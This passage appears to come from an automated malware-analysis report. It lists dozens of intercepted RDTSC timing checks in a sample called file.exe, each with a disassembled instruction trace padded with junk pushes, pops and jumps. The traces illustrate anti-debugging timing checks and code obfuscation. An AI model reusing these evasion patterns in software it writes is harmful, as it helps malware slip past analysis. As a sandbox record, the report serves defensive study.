              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0104 second address: 52C011A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C011A second address: 52C011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C011E second address: 52C0122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0122 second address: 52C0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0128 second address: 52C01E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c mov bx, ABA4h 0x00000010 jmp 00007FBA4947B56Dh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FBA4947B571h 0x0000001f pop eax 0x00000020 jmp 00007FBA4947B56Eh 0x00000025 push 09DE4245h 0x0000002a pushad 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f mov ecx, ebx 0x00000031 popad 0x00000032 add dword ptr [esp], 6BCAE92Bh 0x00000039 pushad 0x0000003a mov si, bx 0x0000003d mov ch, dl 0x0000003f popad 0x00000040 mov eax, dword ptr fs:[00000000h] 0x00000046 jmp 00007FBA4947B574h 0x0000004b nop 0x0000004c jmp 00007FBA4947B570h 0x00000051 push eax 0x00000052 pushad 0x00000053 call 00007FBA4947B571h 0x00000058 mov ecx, 622D21B7h 0x0000005d pop eax 0x0000005e popad 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FBA4947B571h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01E7 second address: 52C01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01ED second address: 52C01F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01F4 second address: 52C0217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 18h 0x0000000a jmp 00007FBA4947DCF2h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx ecx, dx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0217 second address: 52C025F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 3EC9CE5Ah 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007FBA4947B573h 0x00000014 pop ecx 0x00000015 push ebx 0x00000016 pop eax 0x00000017 popad 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FBA4947B56Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FBA4947B570h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C025F second address: 52C026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C026E second address: 52C0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B574h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0286 second address: 52C028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C028A second address: 52C02AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FBA4947B573h 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02AC second address: 52C0321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA4947DCF0h 0x00000008 pop eax 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FBA4947DCEFh 0x00000019 sbb si, AEDEh 0x0000001e jmp 00007FBA4947DCF9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FBA4947DCF0h 0x0000002a jmp 00007FBA4947DCF5h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0321 second address: 52C036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA4947B577h 0x00000008 pop esi 0x00000009 mov edx, 5B32887Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007FBA4947B570h 0x00000017 mov dword ptr [esp], edi 0x0000001a pushad 0x0000001b movzx ecx, bx 0x0000001e mov ebx, 60F033AEh 0x00000023 popad 0x00000024 mov eax, dword ptr [75AF4538h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d pop edi 0x0000002e push esi 0x0000002f pop edi 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C036F second address: 52C0375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0375 second address: 52C0379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0379 second address: 52C03F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e jmp 00007FBA4947DCEEh 0x00000013 xor eax, ebp 0x00000015 jmp 00007FBA4947DCF1h 0x0000001a nop 0x0000001b jmp 00007FBA4947DCEEh 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FBA4947DCF7h 0x0000002a jmp 00007FBA4947DCF3h 0x0000002f popfd 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03F3 second address: 52C03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03F7 second address: 52C041B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, si 0x00000009 popad 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA4947DCF7h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C041B second address: 52C0468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FBA4947B56Eh 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBA4947B577h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0468 second address: 52C0480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947DCF4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0480 second address: 52C04D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b jmp 00007FBA4947B577h 0x00000010 mov eax, dword ptr fs:[00000018h] 0x00000016 jmp 00007FBA4947B576h 0x0000001b mov ecx, dword ptr [eax+00000FDCh] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FBA4947B56Ah 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04D2 second address: 52C04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04D6 second address: 52C04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04DC second address: 52C0558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007FBA4947DCF2h 0x00000010 jns 00007FBA4947DD24h 0x00000016 jmp 00007FBA4947DCF0h 0x0000001b add eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FBA4947DCEEh 0x00000024 jmp 00007FBA4947DCF5h 0x00000029 popfd 0x0000002a mov ecx, 448585C7h 0x0000002f popad 0x00000030 mov ecx, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FBA4947DCF4h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0558 second address: 52C055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C055C second address: 52C0562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0562 second address: 52C0568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0568 second address: 52C056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C056C second address: 52C0570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0570 second address: 52C0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA4947DCEBh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B025D second address: 52B0263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0263 second address: 52B0267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0267 second address: 52B02BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 2Ch 0x0000000e jmp 00007FBA4947B576h 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 push ecx 0x00000018 mov bx, EBECh 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FBA4947B56Bh 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FBA4947B570h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02BD second address: 52B02CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02CC second address: 52B02E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B574h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02E4 second address: 52B030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA4947DCF5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B030D second address: 52B0313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0313 second address: 52B0354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA4947DCF6h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FBA4947DCECh 0x00000018 add si, 5388h 0x0000001d jmp 00007FBA4947DCEBh 0x00000022 popfd 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0354 second address: 52B03A8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBA4947B578h 0x00000008 and ch, FFFFFFE8h 0x0000000b jmp 00007FBA4947B56Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007FBA4947B576h 0x0000001b xor al, 00000048h 0x0000001e jmp 00007FBA4947B56Bh 0x00000023 popfd 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0435 second address: 52B0439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0439 second address: 52B043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B043F second address: 52B0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA4947DCF7h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0473 second address: 52B0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0479 second address: 52B0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA4947DCEAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0544 second address: 52B054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B054A second address: 52B0550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0550 second address: 52B0554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0554 second address: 52B05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FBA4947DD28h 0x00000011 jmp 00007FBA4947DCF0h 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d mov bx, BBBEh 0x00000021 popad 0x00000022 jne 00007FBAB9C6BBEDh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movzx esi, dx 0x0000002e push ebx 0x0000002f pop eax 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B05A3 second address: 52B05B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B56Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B05B2 second address: 52B0607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007FBA4947DCEEh 0x00000013 and cx, DBE8h 0x00000018 jmp 00007FBA4947DCEBh 0x0000001d popfd 0x0000001e pop esi 0x0000001f jmp 00007FBA4947DCF9h 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp-2Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edi, ax 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0607 second address: 52B0631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d mov di, ax 0x00000010 mov dh, ah 0x00000012 popad 0x00000013 mov dword ptr [esp], esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBA4947B572h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0631 second address: 52B0643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947DCEEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0643 second address: 52B0647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0647 second address: 52B0665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA4947DCF3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0665 second address: 52B06D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FBA4947B56Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FBA4947B56Eh 0x00000019 jmp 00007FBA4947B575h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FBA4947B576h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B06D6 second address: 52B06DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0747 second address: 52B002A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FBA4947B576h 0x00000010 je 00007FBAB9C69449h 0x00000016 xor eax, eax 0x00000018 jmp 00007FBA49454C9Ah 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov esi, eax 0x0000002a cmp esi, 00000000h 0x0000002d setne al 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007FBA4947B567h 0x00000036 jmp 00007FBA4947B66Fh 0x0000003b call 00007FBA4D816F85h 0x00000040 mov edi, edi 0x00000042 jmp 00007FBA4947B56Eh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FBA4947B577h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B002A second address: 52B0030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0030 second address: 52B0034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0034 second address: 52B006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA4947DCEEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FBA4947DCF0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBA4947DCEAh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B006C second address: 52B0072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0072 second address: 52B00F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007FBA4947DCEEh 0x00000010 pushfd 0x00000011 jmp 00007FBA4947DCF2h 0x00000016 xor ecx, 0FDEF8C8h 0x0000001c jmp 00007FBA4947DCEBh 0x00000021 popfd 0x00000022 pop esi 0x00000023 jmp 00007FBA4947DCF9h 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007FBA4947DCF1h 0x0000002f xchg eax, ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FBA4947DCEDh 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0B84 second address: 52B0B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0B88 second address: 52B0BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0BA4 second address: 52B0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B56Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0BB6 second address: 52B0BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FBA4947DCE9h 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0BD4 second address: 52B0C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 mov ax, 75A3h 0x0000000a pushfd 0x0000000b jmp 00007FBA4947B578h 0x00000010 xor ax, FAE8h 0x00000015 jmp 00007FBA4947B56Bh 0x0000001a popfd 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 movsx ebx, ax 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C11 second address: 52B0C60 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBA4947DCEEh 0x00000008 add esi, 1CC10D48h 0x0000000e jmp 00007FBA4947DCEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 pop edx 0x00000019 mov edx, esi 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007FBA4947DCF7h 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C60 second address: 52B0C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C64 second address: 52B0C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C68 second address: 52B0C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C6E second address: 52B0C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947DCF8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0C8A second address: 52B0CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FBA4947B579h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBA4947B578h 0x0000001e rdtsc
